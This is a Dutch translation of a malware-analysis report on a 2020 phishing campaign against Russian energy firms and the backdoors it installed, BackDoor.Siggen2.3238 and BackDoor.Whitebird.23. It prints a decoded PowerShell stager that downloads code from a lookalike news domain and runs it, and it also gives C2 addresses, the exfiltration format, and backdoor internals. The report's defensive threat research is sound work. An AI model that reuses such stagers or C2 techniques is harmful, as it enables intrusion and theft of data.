Uit onze ervaring met het onderzoeken van computerbeveiligingsincidenten blijkt dat e-mail nog steeds een van de meest gebruikte kanalen is die door aanvallers worden gebruikt om aanvankelijk de aangevallen netwerkinfrastructuren binnen te dringen. Eén onzorgvuldige actie met een verdachte (of niet zo verdachte) brief wordt een toegangspunt voor verdere infecties. Daarom maken cybercriminelen actief gebruik van social engineering-methoden, zij het met wisselend succes.
In dit bericht willen we het hebben over ons recente onderzoek naar een spamcampagne gericht op een aantal bedrijven in het Russische brandstof- en energiecomplex. Alle aanvallen volgden hetzelfde scenario, waarbij gebruik werd gemaakt van valse e-mails, en niemand leek veel moeite te hebben gestoken in de tekstinhoud van deze e-mails.
Inlichtingen Dienst
Het begon allemaal eind april 2020, toen Doctor Web-virusanalisten een spamcampagne ontdekten waarin hackers een bijgewerkte telefoongids stuurden naar werknemers van een aantal bedrijven in het Russische brandstof- en energiecomplex. Dit was natuurlijk niet zomaar een blijk van bezorgdheid, aangezien de directory niet echt was en de .docx-documenten twee afbeeldingen van externe bronnen downloadden.
Eén ervan werd naar de computer van de gebruiker gedownload vanaf de news[.]zannews[.]com-server. Het is opmerkelijk dat de domeinnaam vergelijkbaar is met het domein van het anticorruptiemediacentrum van Kazachstan - zannews[.]kz. Aan de andere kant deed het gebruikte domein onmiddellijk denken aan een andere campagne uit 2015, bekend als TOPNEWS, die een ICEFOG-achterdeur gebruikte en Trojaanse controledomeinen had met de substring ‘nieuws’ in hun naam. Een ander interessant kenmerk was dat bij het verzenden van e-mails naar verschillende ontvangers, verzoeken om een afbeelding te downloaden verschillende verzoekparameters of unieke afbeeldingsnamen gebruikten.
Wij zijn van mening dat dit is gedaan met het doel informatie te verzamelen om een ‘betrouwbare’ geadresseerde te identificeren, die dan gegarandeerd de brief op het juiste moment zal openen. Het SMB-protocol werd gebruikt om de afbeelding van de tweede server te downloaden, wat kon worden gedaan om NetNTLM-hashes te verzamelen van de computers van medewerkers die het ontvangen document hadden geopend.
En hier is de brief zelf met de nep-directory:
In juni van dit jaar begonnen hackers een nieuwe domeinnaam, sports[.]manhajnews[.]com, te gebruiken om afbeeldingen te uploaden. Uit de analyse bleek dat de subdomeinen van manhajnews[.]com in ieder geval sinds september 2019 in spammailings worden gebruikt. Een van de doelwitten van deze campagne was een grote Russische universiteit.
Ook kwamen de organisatoren van de aanval in juni met een nieuwe tekst voor hun brieven: dit keer bevatte het document informatie over de ontwikkeling van de industrie. Uit de tekst van de brief bleek duidelijk dat de auteur ofwel geen moedertaalspreker van het Russisch was, ofwel opzettelijk een dergelijke indruk over zichzelf wekte. Helaas bleken de ideeën over de ontwikkeling van de industrie, zoals altijd, slechts een dekmantel te zijn: het document downloadde opnieuw twee afbeeldingen, terwijl de server werd gewijzigd in download[.]inklingpaper[.]com.
De volgende innovatie volgde in juli. In een poging de detectie van kwaadaardige documenten door antivirusprogramma's te omzeilen, begonnen aanvallers Microsoft Word-documenten te gebruiken die waren gecodeerd met een wachtwoord. Tegelijkertijd besloten de aanvallers een klassieke social engineering-techniek te gebruiken: beloningsmeldingen.
De tekst van het beroepschrift was opnieuw in dezelfde stijl geschreven, wat extra argwaan wekte bij de geadresseerde. De server voor het downloaden van de afbeelding is ook niet veranderd.
Merk op dat in alle gevallen elektronische mailboxen geregistreerd op de domeinen mail[.]ru en yandex[.]ru werden gebruikt om brieven te verzenden.
Aanval
Begin september 2020 was het tijd voor actie. Onze virusanalisten registreerden een nieuwe aanvalsgolf, waarbij aanvallers opnieuw brieven stuurden onder het voorwendsel een telefoongids bij te werken. Deze keer bevatte de bijlage echter een kwaadaardige macro.
Bij het openen van het bijgevoegde document maakte de macro twee bestanden:
- VBS-script %APPDATA%microsoftwindowsstart menuprogramsstartupadoba.vbs, dat bedoeld was om een batchbestand te starten;
- Het batchbestand zelf %APPDATA%configstest.bat, dat onduidelijk was.
De essentie van zijn werk komt neer op het lanceren van de Powershell-shell met bepaalde parameters. De parameters die aan de shell worden doorgegeven, worden gedecodeerd in opdrachten:
$o = [activator]::CreateInstance([type]::GetTypeFromCLSID("F5078F35-C551-11D3-89B9-0000F81FE221"));$o.Open("GET", "http://newsinfo.newss.nl/nissenlist/johnlists.html", $False);$o.Send(); IEX $o.responseText;Zoals uit de gepresenteerde opdrachten blijkt, is het domein waarvan de payload wordt gedownload opnieuw vermomd als een nieuwssite. Een eenvoudige , wiens enige taak het is om shellcode van de commando- en controleserver te ontvangen en deze uit te voeren. We hebben twee soorten achterdeuren kunnen identificeren die op de pc van het slachtoffer kunnen worden geïnstalleerd.
BackDoor.Siggen2.3238
De eerste is BackDoor.Siggen2.3238 — onze specialisten hadden het nog niet eerder gezien, en er waren ook geen vermeldingen van dit programma door andere antivirusleveranciers.
Dit programma is een achterdeur geschreven in C++ en draait op 32-bits Windows-besturingssystemen.
BackDoor.Siggen2.3238 kan communiceren met de beheerserver via twee protocollen: HTTP en HTTPS. Het geteste voorbeeld maakt gebruik van het HTTPS-protocol. De volgende User-Agent wordt gebruikt bij verzoeken aan de server:
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; SE)
In dit geval worden alle verzoeken voorzien van de volgende set parameters:
%s;type=%s;length=%s;realdata=%send
waarbij elke regel %s dienovereenkomstig wordt vervangen door:
- ID van de geïnfecteerde computer,
- soort verzoek dat wordt verzonden,
- lengte van gegevens in het realdata-veld,
- gegevens.
In de fase waarin informatie over het geïnfecteerde systeem wordt verzameld, genereert de achterdeur een regel als:
lan=%s;cmpname=%s;username=%s;version=%s;
waarbij lan het IP-adres is van de geïnfecteerde computer, cmpname de computernaam is, gebruikersnaam de gebruikersnaam is, versie de regel 0.0.4.03 is.
Deze informatie met de sysinfo-identificatie wordt via een POST-verzoek verzonden naar de controleserver op https[:]//31.214[.]157.14/log.txt. Als reactie BackDoor.Siggen2.3238 ontvangt het HEART-signaal, de verbinding wordt als succesvol beschouwd en de achterdeur begint de hoofdcyclus van communicatie met de server.
Volledigere beschrijving van de werkingsprincipes BackDoor.Siggen2.3238 staat bij ons .
BackDoor.Whitebird.23
Het tweede programma is een aanpassing van de BackDoor.Whitebird-achterdeur, bij ons al bekend van het incident met een overheidsinstantie in Kazachstan. Deze versie is geschreven in C++ en is ontworpen voor gebruik op zowel 32-bits als 64-bits Windows-besturingssystemen.
Zoals de meeste programma's van dit type, BackDoor.Whitebird.23 ontworpen om een gecodeerde verbinding tot stand te brengen met de controleserver en ongeautoriseerde controle over een geïnfecteerde computer. Geïnstalleerd in een gecompromitteerd systeem met behulp van een druppelaar .
Het voorbeeld dat we onderzochten was een kwaadaardige bibliotheek met twee exports:
- Google Spelen
- Test.
Aan het begin van zijn werk decodeert het de configuratie die in de achterdeur is aangesloten met behulp van een algoritme dat is gebaseerd op de XOR-bewerking met byte 0x99. De configuratie ziet er als volgt uit:
struct st_cfg
{
_DWORD dword0;
wchar_t campaign[64];
wchar_t cnc_addr[256];
_DWORD cnc_port;
wchar_t cnc_addr2[100];
wchar_t cnc_addr3[100];
_BYTE working_hours[1440];
wchar_t proxy_domain[50];
_DWORD proxy_port;
_DWORD proxy_type;
_DWORD use_proxy;
_BYTE proxy_login[50];
_BYTE proxy_password[50];
_BYTE gapa8c[256];
};
Om een constante werking te garanderen, verandert de achterdeur de waarde die in het veld is opgegeven werkuren configuraties. Het veld bevat 1440 bytes, die de waarden 0 of 1 aannemen en elke minuut van elk uur van de dag vertegenwoordigen. Creëert een aparte thread voor elke netwerkinterface die naar de interface luistert en vanaf de geïnfecteerde computer naar autorisatiepakketten op de proxyserver zoekt. Wanneer een dergelijk pakket wordt gedetecteerd, voegt de achterdeur informatie over de proxyserver toe aan de lijst. Controleert daarnaast via WinAPI op de aanwezigheid van een proxy InternetQueryOptionW.
Het programma controleert de huidige minuten en uren en vergelijkt deze met de gegevens in het veld werkuren configuraties. Als de waarde voor de betreffende minuut van de dag niet nul is, wordt er een verbinding tot stand gebracht met de controleserver.
Het tot stand brengen van een verbinding met de server simuleert het tot stand brengen van een verbinding met behulp van het TLS versie 1.0-protocol tussen de client en de server. Het lichaam van de achterdeur bevat twee buffers.
De eerste buffer bevat het TLS 1.0 Client Hello-pakket.
De tweede buffer bevat TLS 1.0 Client Key Exchange-pakketten met een sleutellengte van 0x100 bytes, Change Cipher Spec, Encrypted Handshake Message.
Bij het verzenden van een Client Hello-pakket schrijft de achterdeur 4 bytes van de huidige tijd en 28 bytes aan pseudo-willekeurige gegevens in het Client Random-veld, als volgt berekend:
v3 = time(0);
t = (v3 >> 8 >> 16) + ((((((unsigned __int8)v3 << 8) + BYTE1(v3)) << 8) + BYTE2(v3)) << 8);
for ( i = 0; i < 28; i += 4 )
*(_DWORD *)&clientrnd[i] = t + *(_DWORD *)&cnc_addr[i / 4];
for ( j = 0; j < 28; ++j )
clientrnd[j] ^= 7 * (_BYTE)j;
Het ontvangen pakket wordt naar de controleserver verzonden. Het antwoord (Server Hello-pakket) controleert:
- naleving van TLS-protocol versie 1.0;
- overeenstemming van de tijdstempel (de eerste 4 bytes van het Random Data-pakketveld) gespecificeerd door de client met de tijdstempel gespecificeerd door de server;
- overeenkomst van de eerste 4 bytes na de tijdstempel in het veld Willekeurige gegevens van de client en server.
In het geval van de gespecificeerde overeenkomsten bereidt de achterdeur een Client Key Exchange-pakket voor. Om dit te doen, wijzigt het de openbare sleutel in het Client Key Exchange-pakket, evenals de Encryption IV en Encryption Data in het Encrypted Handshake Message-pakket.
De achterdeur ontvangt vervolgens het pakket van de command-and-control-server, controleert of de TLS-protocolversie 1.0 is en accepteert vervolgens nog eens 54 bytes (de hoofdtekst van het pakket). Hiermee is het instellen van de verbinding voltooid.
Volledigere beschrijving van de werkingsprincipes BackDoor.Whitebird.23 staat bij ons .
Conclusie en conclusies
Door analyse van documenten, malware en de gebruikte infrastructuur kunnen we met vertrouwen zeggen dat de aanval is voorbereid door een van de Chinese APT-groepen. Gezien de functionaliteit van achterdeurtjes die bij een succesvolle aanval op de computers van slachtoffers worden geïnstalleerd, leidt infectie op zijn minst tot diefstal van vertrouwelijke informatie van de computers van aangevallen organisaties.
Bovendien is een zeer waarschijnlijk scenario de installatie van gespecialiseerde Trojaanse paarden op lokale servers met een speciale functie. Dit kunnen domeincontrollers, mailservers, internetgateways, enz. zijn. Zoals we in het voorbeeld kunnen zien zijn dergelijke servers om verschillende redenen van bijzonder belang voor aanvallers.
Bron: www.habr.com